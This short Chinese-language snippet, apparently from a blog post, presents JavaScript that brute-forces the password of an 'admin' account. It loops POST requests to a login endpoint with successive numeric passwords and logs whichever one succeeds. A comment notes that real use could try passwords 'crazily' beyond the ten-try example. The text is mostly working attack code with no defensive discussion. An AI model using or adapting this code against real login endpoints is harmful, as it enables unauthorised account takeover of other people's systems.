此處以一個簡單的測試用戶登錄接口爲例。。。
如果一個網站的登錄模塊設計的很簡單的話,可以通過不斷髮起請求去測試一個賬號的密碼。。。
// 第一步:創建 XMLHttpRequest 對象
var xmlhttp;
if (window.XMLHttpRequest) {// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp = new XMLHttpRequest();
}
else {// code for IE6, IE5
xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
// 此處僅做一個簡單的10次循環例子,實際中可以進行瘋狂地嘗試
for (let i = 0; i < 10; i++) {
let data = "account=admin&password=" + i
setTimeout(function () {
// 第二步:向服務器發送請求
xmlhttp.open("POST", "https://yourServerUrL/loginByPwd", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(data)
// 第三步:獲得來自服務器的響應
xmlhttp.onreadystatechange = function () {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
if(JSON.parse(xmlhttp.responseText).code === "200") {
console.log('賬號admin的密碼爲'+i)
}
}
}
}, i * 500)
}